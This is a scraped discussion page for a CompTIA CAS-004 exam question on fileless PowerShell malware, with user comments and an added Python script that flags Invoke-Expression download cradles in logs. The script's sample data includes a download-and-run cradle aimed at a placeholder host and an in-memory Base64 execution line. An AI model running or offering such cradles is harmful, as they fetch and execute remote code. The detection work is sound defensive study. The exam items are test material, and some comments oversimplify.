
Exam CAS-004 topic 1 question 105 discussion

Actual exam question from CompTIA's CAS-004
Question #: 105
Topic #: 1

A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against?

  • A. Worm
  • B. Logic bomb
  • C. Fileless
  • D. Rootkit
Suggested Answer: C

Comments

23169fd
11 months, 3 weeks ago
Selected Answer: C
Characteristics: Fileless malware does not write any files to disk. Instead, it resides in memory and uses legitimate system tools (such as PowerShell) to execute malicious activities.
Behavior: Since it operates in memory, it can evade traditional antivirus solutions that rely on scanning files on disk. This type of malware often leverages built-in tools like PowerShell to download and execute malicious scripts directly from the internet.
Detection and Protection: Protecting against fileless malware typically involves using endpoint detection and response (EDR) tools, advanced threat protection solutions, and monitoring for unusual behavior and use of system tools.
upvoted 3 times
...
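As an added example (not from the question or any commenter): detection logic in Python that scans constructed PowerShell Script Block Logging text (Windows event ID 4104) and flags Invoke-Expression only when it is combined with a download or an in-memory decode, which is the behaviour-based monitoring the comment above recommends. The sample events, hostnames, and the indicator list are assumptions for illustration.

```python
import re

# Constructed sample script-block text, shaped like the ScriptBlockText field of
# PowerShell Operational event 4104. Not real telemetry; URL is a placeholder.
SAMPLE_EVENTS = [
    {"id": 1, "host": "srv01",
     "script": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"id": 2, "host": "srv01",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"id": 3, "host": "srv02",
     "script": "Invoke-Expression ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)))"},
    {"id": 4, "host": "srv02",
     "script": "Invoke-Expression 'Get-Date'"},
]

# Behavioural indicators (name, regex). These match how the script runs, not a
# file hash, which is why they still fire when nothing is written to disk.
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(Invoke-Expression|IEX)\b", re.IGNORECASE)),
    ("remote_download", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b",
        re.IGNORECASE)),
    ("decode_in_memory", re.compile(r"FromBase64String|EncodedCommand", re.IGNORECASE)),
]


def score_script_block(script):
    """Return the names of all indicators that match one script block, in list order."""
    return [name for name, rx in INDICATORS if rx.search(script)]


def find_fileless_candidates(events, min_indicators=2):
    """Flag blocks where Invoke-Expression is paired with a download or decode.

    A lone Invoke-Expression is common in legitimate admin scripts, so a single
    indicator is not enough; the combination is what marks a download-and-run cradle.
    """
    hits = []
    for ev in events:
        matched = score_script_block(ev["script"])
        if "invoke_expression" in matched and len(matched) >= min_indicators:
            hits.append({"id": ev["id"], "host": ev["host"], "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in find_fileless_candidates(SAMPLE_EVENTS):
        print(f"event {hit['id']} on {hit['host']}: {', '.join(hit['indicators'])}")
```

Script Block Logging must be enabled on the host for event 4104 to exist; without it the in-memory activity leaves no record for this kind of rule to read.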
OdinAtlasSteel
1 year, 7 months ago
Selected Answer: C
The use of PowerShell and the Invoke-Expression function indicates that the attack is leveraging the scripting capabilities within the system, which is a hallmark of fileless malware. The absence of Indicators of Compromise (IOCs) on disk, despite scanning with an antivirus, suggests that the malware might be operating in memory or using fileless techniques.
upvoted 2 times
...
BiteSize
1 year, 11 months ago
Selected Answer: C
Antivirus software is signature-based and scans when the data is at rest or accessed. Logic bombs, rootkits, and worms reside on the filesystem. Fileless means it is volatile, temporary, and exists in the RAM. Source: Verifying each answer against Chat GPT, my experience, other test banks, a written book, and weighing in the discussion from all users to create a 100% accurate guide for myself before I take the exam. (It isn't easy because of the time needed, but it is doing my diligence.)
upvoted 4 times
...
fb2fcb1
1 year, 11 months ago
Selected Answer: C
C. Fileless. A fileless malware attack involves malware that operates in memory, instead of writing files to the hard drive, making it more challenging to detect with traditional antivirus solutions. This type of malware can use legitimate scripting languages (like PowerShell) and tools native to the operating system to execute malicious activities, which seems to match the situation described in the question. Worms (A) are a type of malware that spread across networks, typically without user intervention. Logic bombs (B) are malicious payloads that are triggered by a specific event. Rootkits (D) are malware that provide privileged (root-level) access to a computer while hiding their presence. While any of these could theoretically use fileless techniques, the specific focus on PowerShell and the failure of disk scanning to find Indicators of Compromise (IOCs) suggest fileless malware is the most accurate answer.
upvoted 2 times
...
Alizadeh
2 years, 4 months ago
Selected Answer: C
The description of the attack suggests that the type of malware the solution should protect against is Fileless malware. Therefore, the correct option is C.
upvoted 2 times
...
hidady
2 years, 6 months ago
C is the correct answer
upvoted 2 times
...
ryanzou
2 years, 8 months ago
Selected Answer: C
Fileless malware is a type of malicious activity that uses native, legitimate tools built into a system to execute a cyber attack.
upvoted 3 times
...
david124
2 years, 9 months ago
Selected Answer: C
Fileless is the right answer.
upvoted 3 times
...
dangerelchulo
2 years, 10 months ago
Selected Answer: C
The key point is that it used PowerShell and was not found by antivirus, so it uses an exploit: https://www.crowdstrike.com/cybersecurity-101/malware/fileless-malware/
upvoted 4 times
...